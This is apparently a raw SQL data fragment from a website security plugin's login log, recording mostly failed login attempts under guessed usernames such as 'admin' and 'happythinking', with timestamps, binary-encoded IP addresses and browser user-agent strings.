(9815, 41784, 1701322321.573660, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1£', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),
(9814, 41783, 1701321830.142104, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9813, 41783, 1701321830.133848, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9812, 41776, 1701321419.540935, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(9810, 41772, 1701319797.926095, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9811, 41776, 1701321419.523473, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(9809, 41772, 1701319797.899472, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9808, 41770, 1701318857.739206, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53'),
(9807, 41767, 1701317105.928014, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9806, 41767, 1701317105.880275, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9805, 41764, 1701315846.555910, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),
(9804, 41749, 1701313974.447314, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9803, 41742, 1701313309.955799, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),
(9802, 41729, 1701310329.516749, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9801, 41726, 1701308555.843799, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb0Ÿ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9800, 41723, 1701307436.032607, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9799, 41719, 1701305183.332570, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9798, 41717, 1701304765.117257, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9797, 41715, 1701303052.284730, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9796, 41713, 1701302617.870704, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9795, 41712, 1701302129.506595, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôL“', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9794, 41701, 1701299115.994279, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb0Ÿ', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9793, 41699, 1701297069.150001, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ!¨', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),
(9792, 41697, 1701296409.265779, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½:', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9791, 41696, 1701295842.678797, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9790, 41694, 1701294794.839589, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),
(9789, 41691, 1701293875.326370, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),
(9788, 41690, 1701293873.136571, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),
(9787, 41689, 1701293389.337438, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'),
(9786, 41688, 1701292748.468977, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9785, 41686, 1701291288.343625, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ©4‹', 'Mozilla/5.0'),
(9784, 41685, 1701290185.670147, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9783, 41683, 1701289591.082332, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53'),
(9782, 41680, 1701287621.684720, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(10246, 49907, 1710844967.489500, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD²ôº', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(10237, 49860, 1710767958.823879, 1, 'loginFailInvalidUsername', 'john', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿC+K', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(10193, 49558, 1710396454.309259, 1, 'loginFailInvalidUsername', 'garak', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(10194, 49558, 1710396454.325364, 1, 'loginFailInvalidUsername', 'garak', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(10195, 49567, 1710416979.664067, 1, 'loginFailInvalidUsername', 'user1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿTê`.', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),
(10196, 49569, 1710416981.836281, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ]ºò', 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10197, 49572, 1710416986.920078, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\rC?Z', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(10198, 49579, 1710417014.965144, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹BZý', 'Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),
(10199, 49581, 1710443956.425534, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ%aåY', 'Mozilla/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build/RB3N5C; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36'),
(10200, 49587, 1710443999.909624, 1, 'loginFailInvalidUsername', 'deneme', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶Je=', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),
(10201, 49589, 1710444014.026039, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Ç/ô', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(10202, 49591, 1710444023.305510, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ]ºò', 'Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10236, 49860, 1710767958.807118, 1, 'loginFailInvalidUsername', 'john', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿC+K', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(10601, 51429, 1712320577.916842, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ½Å', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10600, 51428, 1712320574.725943, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»úl', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10599, 51427, 1712320569.984840, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ„š>ƒ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10597, 51425, 1712320566.421374, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿±®´', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10598, 51426, 1712320567.945476, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÎ=A', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10596, 51424, 1712320566.323393, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«<œ‘', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10731, 51843, 1712427490.231462, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿßæš', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10730, 51827, 1712420260.772202, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ¾:', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10729, 51802, 1712398932.065931, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÃ¼í', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10728, 51800, 1712396926.089851, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËÂ`Û', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10727, 51797, 1712392780.278682, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1/› ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10726, 51790, 1712382629.690314, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ½Å', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10725, 51789, 1712382295.534421, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\SgÕ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10724, 51788, 1712382092.722119, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+\0é', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10723, 51776, 1712380620.236025, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÙ§û', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10722, 51774, 1712378951.225037, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÿ‘F', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10721, 51772, 1712378724.170031, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+Y÷', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10720, 51771, 1712378671.981207, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ¥ú', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10719, 51770, 1712378644.350028, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿtDe7', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10718, 51768, 1712376298.688736, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿu÷â', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10717, 51764, 1712373465.231187, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|Ù^—', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10716, 51763, 1712373295.201421, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß²T…', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10715, 51762, 1712371769.073183, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜:¸½', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10714, 51756, 1712371582.250383, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿT6FØ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10713, 51620, 1712361518.853432, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1‘mè', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10712, 51608, 1712357570.993129, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=	gÔ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10711, 51606, 1712356761.520613, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾¼K­', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10710, 51603, 1712351215.468127, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±šU', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10745, 51894, 1712589211.792500, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)åè', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10744, 51881, 1712569317.171006, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿš ?', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10743, 51880, 1712564643.443960, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ<H"', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10742, 51878, 1712563773.935519, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.cü\n', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10736, 51860, 1712496084.404901, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1Íi„', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10735, 51858, 1712472683.431264, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¤\Z', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10734, 51857, 1712471248.262506, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxã¡', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10733, 51856, 1712468831.216228, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜9€', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10732, 51855, 1712464675.003274, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ£5Ê', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10741, 51870, 1712552815.343338, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg`-ˆ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10740, 51869, 1712548472.682432, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz°–9', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10739, 51867, 1712547114.059067, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿpÄ	D', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10738, 51866, 1712546969.206035, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿpÄ	D', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10737, 51865, 1712531237.801980, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ&‰ÆB', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10746, 52032, 1712700407.518168, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO‘{Ö', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8746, 31182, 1692449823.600945, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³l5', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8747, 31183, 1692451404.914304, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1•hù', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8748, 31184, 1692452265.584419, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-øL', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8749, 31185, 1692452403.696999, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿº—\\´', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8750, 31188, 1692455235.191780, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºzl¦', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8751, 31189, 1692456949.996754, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿfù', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8752, 31190, 1692457321.337834, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼Ièâ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8753, 31192, 1692458066.291834, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶²™æ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8754, 31193, 1692458674.434364, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÌmÆ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8755, 31196, 1692459798.508724, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¡3R', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9327, 33086, 1694685605.761216, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$DÜM', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9328, 33087, 1694685610.954022, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn‰Âw', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9329, 33088, 1694685623.425802, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²†²\Z', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9330, 33089, 1694685627.465377, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz²ß‡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9331, 33089, 1694685627.476256, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz²ß‡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9332, 33090, 1694685631.447783, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ¼óñ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9333, 33091, 1694685637.394774, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6ÒQ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9334, 33092, 1694685641.767507, 1, 'loginFailInvalidUsername', 'password123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg†ï1', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
